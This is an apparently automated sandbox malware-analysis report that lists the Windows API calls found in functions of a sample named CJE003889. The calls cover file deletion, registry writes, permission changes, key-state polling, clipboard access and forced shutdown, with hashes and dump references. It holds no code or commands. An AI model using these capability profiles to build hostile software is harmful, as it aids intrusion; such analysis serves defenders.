                                                          • _wcscmp.LIBCMT ref: 00CCEFE2
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00CCEFF4
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00CCF00E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CCF026
                                                          • FindClose.KERNEL32(00000000), ref: 00CCF031
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CCF04D
                                                          • _wcscmp.LIBCMT ref: 00CCF074
                                                          • _wcscmp.LIBCMT ref: 00CCF08B
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCF09D
                                                          • SetCurrentDirectoryW.KERNEL32(00D18920), ref: 00CCF0BB
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCF0C5
                                                          • FindClose.KERNEL32(00000000), ref: 00CCF0D2
                                                          • FindClose.KERNEL32(00000000), ref: 00CCF0E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: efdcbf86646f968575849430b34592d8a21241a1ee1385b7c382a3ce08fc9099
                                                          • Instruction ID: ae8956efe103442a973c1487350c3801b5b7811370656471d04bc834c5c8b4f2
                                                          • Opcode Fuzzy Hash: efdcbf86646f968575849430b34592d8a21241a1ee1385b7c382a3ce08fc9099
                                                          • Instruction Fuzzy Hash: D531E3325002487BDB14EBA4EC89FEE77AD9F48760F1041BDE910D20A1DB70DB86DB65
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE0953
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CEF910,00000000,?,00000000,?,?), ref: 00CE09C1
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CE0A09
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CE0A92
                                                          • RegCloseKey.ADVAPI32(?), ref: 00CE0DB2
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CE0DBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 3daed9f6c372e78ba9d3f698e81dcc6e744adbfcf27cccd4d0569fcc9cbe8754
                                                          • Instruction ID: b0be421fd358ef821de6a8a93b4a6dbc8e97222b5700080a0016e5225ea7d818
                                                          • Opcode Fuzzy Hash: 3daed9f6c372e78ba9d3f698e81dcc6e744adbfcf27cccd4d0569fcc9cbe8754
                                                          • Instruction Fuzzy Hash: 57028B756006419FCB24EF15C891E2AB7E5FF89324F14885CF99A9B3A2CB70ED41DB81
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CCF113
                                                          • _wcscmp.LIBCMT ref: 00CCF128
                                                          • _wcscmp.LIBCMT ref: 00CCF13F
                                                            • Part of subcall function 00CC4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CC43A0
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CCF16E
                                                          • FindClose.KERNEL32(00000000), ref: 00CCF179
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CCF195
                                                          • _wcscmp.LIBCMT ref: 00CCF1BC
                                                          • _wcscmp.LIBCMT ref: 00CCF1D3
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCF1E5
                                                          • SetCurrentDirectoryW.KERNEL32(00D18920), ref: 00CCF203
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCF20D
                                                          • FindClose.KERNEL32(00000000), ref: 00CCF21A
                                                          • FindClose.KERNEL32(00000000), ref: 00CCF22C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: c5ec39300a15f51a0f370d0d6371410e4e943f61be8923be7cf51573f8d207c5
                                                          • Instruction ID: edabd5ce3be9b4838b240b014afbe60280b262992ba272517650065748c4afcf
                                                          • Opcode Fuzzy Hash: c5ec39300a15f51a0f370d0d6371410e4e943f61be8923be7cf51573f8d207c5
                                                          • Instruction Fuzzy Hash: 16310536500259BACB10EBA0EC98FEE77AE9F45320F14017DE910E20A0DB30DF87DA64
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CCA20F
                                                          • __swprintf.LIBCMT ref: 00CCA231
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CCA26E
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CCA293
                                                          • _memset.LIBCMT ref: 00CCA2B2
                                                          • _wcsncpy.LIBCMT ref: 00CCA2EE
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CCA323
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CCA32E
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00CCA337
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CCA341
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: a36b693b03bca9def71d8a1b6545c6e150c9c0836496b5ca5149865a3ba36199
                                                          • Instruction ID: d4bc7c251d606419444b1c1933e7924592976882d5e9863fb610363a4640457b
                                                          • Opcode Fuzzy Hash: a36b693b03bca9def71d8a1b6545c6e150c9c0836496b5ca5149865a3ba36199
                                                          • Instruction Fuzzy Hash: 6B31A071900159ABDB21DFA0DC89FEF37BCAF88704F1440BAFA08D6160EB7097458B25
                                                          APIs
                                                            • Part of subcall function 00CB8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CB821E
                                                            • Part of subcall function 00CB8202: GetLastError.KERNEL32(?,00CB7CE2,?,?,?), ref: 00CB8228
                                                            • Part of subcall function 00CB8202: GetProcessHeap.KERNEL32(00000008,?,?,00CB7CE2,?,?,?), ref: 00CB8237
                                                            • Part of subcall function 00CB8202: HeapAlloc.KERNEL32(00000000,?,00CB7CE2,?,?,?), ref: 00CB823E
                                                            • Part of subcall function 00CB8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CB8255
                                                            • Part of subcall function 00CB829F: GetProcessHeap.KERNEL32(00000008,00CB7CF8,00000000,00000000,?,00CB7CF8,?), ref: 00CB82AB
                                                            • Part of subcall function 00CB829F: HeapAlloc.KERNEL32(00000000,?,00CB7CF8,?), ref: 00CB82B2
                                                            • Part of subcall function 00CB829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CB7CF8,?), ref: 00CB82C3
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CB7D13
                                                          • _memset.LIBCMT ref: 00CB7D28
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CB7D47
                                                          • GetLengthSid.ADVAPI32(?), ref: 00CB7D58
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CB7D95
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CB7DB1
                                                          • GetLengthSid.ADVAPI32(?), ref: 00CB7DCE
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CB7DDD
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CB7DE4
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CB7E05
                                                          • CopySid.ADVAPI32(00000000), ref: 00CB7E0C
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CB7E3D
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CB7E63
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CB7E77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 91d3cd30b826d8071bf6b5316fb18bdffd82d54cf1d109b7b76becd5d3b39f88
                                                          • Instruction ID: a375831914332d447c19847176c1337ddde702e7a083786765879ab0d7cc1c22
                                                          • Opcode Fuzzy Hash: 91d3cd30b826d8071bf6b5316fb18bdffd82d54cf1d109b7b76becd5d3b39f88
                                                          • Instruction Fuzzy Hash: 5B613B71904249AFDF01DFA4DC85AEEBB79FF44301F048269F925AA291DB31DE06DB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                          • API String ID: 0-4052911093
                                                          • Opcode ID: 4b37d595f04411f40a0afe17bc2fb47134e13454cdfcff6c78f960be5ab0c825
                                                          • Instruction ID: aae7afb0caf1525b08c66eaa0df232481e18117d6dd7df3190475f5a534303cf
                                                          • Opcode Fuzzy Hash: 4b37d595f04411f40a0afe17bc2fb47134e13454cdfcff6c78f960be5ab0c825
                                                          • Instruction Fuzzy Hash: D2728D71E00619DBDB24CF59D8907EEB7B5FF48310F54816AE919EB290EB309E81DB90
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00CC0097
                                                          • SetKeyboardState.USER32(?), ref: 00CC0102
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00CC0122
                                                          • GetKeyState.USER32(000000A0), ref: 00CC0139
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00CC0168
                                                          • GetKeyState.USER32(000000A1), ref: 00CC0179
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00CC01A5
                                                          • GetKeyState.USER32(00000011), ref: 00CC01B3
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00CC01DC
                                                          • GetKeyState.USER32(00000012), ref: 00CC01EA
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00CC0213
                                                          • GetKeyState.USER32(0000005B), ref: 00CC0221
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 733c2626bc37eb86385ffb8ce4067d7e9b437da8d9425ac9e1951ef9c5b7bd62
                                                          • Instruction ID: 551d3ea1f857f417809a9379d431c14d07212867613222033a357918607006b9
                                                          • Opcode Fuzzy Hash: 733c2626bc37eb86385ffb8ce4067d7e9b437da8d9425ac9e1951ef9c5b7bd62
                                                          • Instruction Fuzzy Hash: 5551C7209047C8A9FB35DBA0C855FAABFB49F01380F1C459ED9D25A5C3DAA49B8CC761
                                                          APIs
                                                            • Part of subcall function 00CE0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE04AC
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CE054B
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CE05E3
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CE0822
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CE082F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: 27a910ee7e8f9651e2503a7a244f8e0dce5b5b7c7868027a4d7d5c8c44786298
                                                          • Instruction ID: bbd211b0fb71489d2342de296cbf2146a6bf7c4f3d398f04b5e2e1e76c451c40
                                                          • Opcode Fuzzy Hash: 27a910ee7e8f9651e2503a7a244f8e0dce5b5b7c7868027a4d7d5c8c44786298
                                                          • Instruction Fuzzy Hash: 5FE16F71204240EFCB24DF25C891E2ABBE8FF89314F14856DF85ADB2A2D630ED45DB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 2acf3be0837ec9af3f8ef364d99395dcc3c1d13a0325b462d7290d4bd821ef15
                                                          • Instruction ID: 4f58a3ea779523ee05f11665639d168cab024e7b557b21fe52ce60a09c38dd18
                                                          • Opcode Fuzzy Hash: 2acf3be0837ec9af3f8ef364d99395dcc3c1d13a0325b462d7290d4bd821ef15
                                                          • Instruction Fuzzy Hash: 5621A175200210EFDB15AF64EC99B6D7BA8EF54710F10802AFA46DB3A1DB30AD02CB54
                                                          APIs
                                                            • Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770
                                                            • Part of subcall function 00CC4A31: GetFileAttributesW.KERNEL32(?,00CC370B), ref: 00CC4A32
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CC38A3
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CC394B
                                                          • MoveFileW.KERNEL32(?,?), ref: 00CC395E
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CC397B
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CC399D
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CC39B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: 32ccf1ce849e7106bcb9d23af3601ab77c5e5757a6e314014a9942e93d77a081
                                                          • Instruction ID: e78d369d08a426e574b3226dc1a714f7b8d97cb31b1eaa3fe6fc8fef8a1541d4
                                                          • Opcode Fuzzy Hash: 32ccf1ce849e7106bcb9d23af3601ab77c5e5757a6e314014a9942e93d77a081
                                                          • Instruction Fuzzy Hash: D351913180518CAACF15EBA0E992EEDB779AF10304F60816DF44677191EF316F09EB61
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CCF440
                                                          • Sleep.KERNEL32(0000000A), ref: 00CCF470
                                                          • _wcscmp.LIBCMT ref: 00CCF484
                                                          • _wcscmp.LIBCMT ref: 00CCF49F
                                                          • FindNextFileW.KERNEL32(?,?), ref: 00CCF53D
                                                          • FindClose.KERNEL32(00000000), ref: 00CCF553
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 713712311-438819550
                                                          • Opcode ID: 813636711e390ac9a55747292416dbd2f4f1287f8f379118b0e358fc8fef1be3
                                                          • Instruction ID: fcad65c847fb4e3398381e161a4bca2376b14abbe724bd62b8cb750f651ada23
                                                          • Opcode Fuzzy Hash: 813636711e390ac9a55747292416dbd2f4f1287f8f379118b0e358fc8fef1be3
                                                          • Instruction Fuzzy Hash: 8E416A7180024AABCF14DF64C885BEEBBB5EF04310F20456EE915A6190DB309A8ADF50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: d2f8a98cffd3b67f445c2d7032f812d03a6734daf466f250036a3adfedb91e96
                                                          • Instruction ID: bd9b61c27865d3210b30aba74a3a43bf805e3cbc5e47d52c2014b6add3e39933
                                                          • Opcode Fuzzy Hash: d2f8a98cffd3b67f445c2d7032f812d03a6734daf466f250036a3adfedb91e96
                                                          • Instruction Fuzzy Hash: 9F129C70A00609EFDF14DFA5D981AEEB3F5FF48300F208529E84AE7290EB35A915DB54
                                                          APIs
                                                            • Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770
                                                            • Part of subcall function 00CC4A31: GetFileAttributesW.KERNEL32(?,00CC370B), ref: 00CC4A32
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CC3B89
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CC3BD9
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CC3BEA
                                                          • FindClose.KERNEL32(00000000), ref: 00CC3C01
                                                          • FindClose.KERNEL32(00000000), ref: 00CC3C0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: 94f4928c58ca917582b81acf01e03ea9cab728d09d3a436ac6fd7c3225ec7310
                                                          • Instruction ID: 2376fd91523eb7b03b62bf42683e74b228d6430576cc044b8e187ed82db4d7d4
                                                          • Opcode Fuzzy Hash: 94f4928c58ca917582b81acf01e03ea9cab728d09d3a436ac6fd7c3225ec7310
                                                          • Instruction Fuzzy Hash: 61318031008385AFC315EF24D8D1EAFB7A8AE91304F404E2DF4E596191EB21DA09DB63
                                                          APIs
                                                            • Part of subcall function 00CB87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CB882B
                                                            • Part of subcall function 00CB87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CB8858
                                                            • Part of subcall function 00CB87E1: GetLastError.KERNEL32 ref: 00CB8865
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00CC51F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
